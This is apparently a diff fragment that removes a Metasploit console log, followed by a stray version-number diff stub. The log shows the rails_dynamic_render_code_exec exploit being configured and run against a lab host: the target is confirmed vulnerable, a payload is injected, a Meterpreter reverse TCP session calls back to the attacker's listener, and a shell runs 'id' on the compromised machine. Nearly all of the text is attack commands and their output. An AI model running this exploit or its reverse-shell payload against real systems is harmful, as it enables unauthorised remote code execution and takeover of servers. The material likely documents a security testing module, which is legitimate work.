-saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/rails.rc 
-[*] Processing scripts/rails.rc for ERB directives.
-resource (scripts/rails.rc)> use exploit/multi/http/rails_dynamic_render_code_exec
-resource (scripts/rails.rc)> set RHOST 172.16.175.251
-RHOST => 172.16.175.251
-resource (scripts/rails.rc)> set payload linux/x86/meterpreter/reverse_tcp
-payload => linux/x86/meterpreter/reverse_tcp
-resource (scripts/rails.rc)> set LHOST 172.16.175.1
-LHOST => 172.16.175.1
-resource (scripts/rails.rc)> check
-[+] 172.16.175.251:3000 The target is vulnerable.
-resource (scripts/rails.rc)> exploit
-[*] Exploit running as background job.
-[*] Started reverse TCP handler on 172.16.175.1:4444 
-
-[*] Sending initial request to detect exploitability
-msf exploit(rails_dynamic_render_code_exec) > [*] 172.16.175.251:3000 - Starting up our web service on http://172.16.175.1:1337/iUDaRVpz ...
-[*] Using URL: http://0.0.0.0:1337/iUDaRVpz
-[*] Local IP: http://192.168.100.13:1337/iUDaRVpz
-[*] uploading image...
-[+] injected payload
-[*] 172.16.175.251:3000 - Sending the payload to the server...
-[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-[*] Sending stage (1495599 bytes) to 172.16.175.251
-[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.251:41246) at 2016-09-29 17:52:00 -0500
-[+] Deleted /tmp/NhhGKCCIgwF
-
-msf exploit(rails_dynamic_render_code_exec) > sessions -i 1
-[*] Starting interaction with 1...
-
-meterpreter > shell
-Process 50809 created.
-Channel 1 created.
-$ id
-uid=1000(student) gid=1000(student) groups=1000(student),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
-$
-```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.2
 .3.1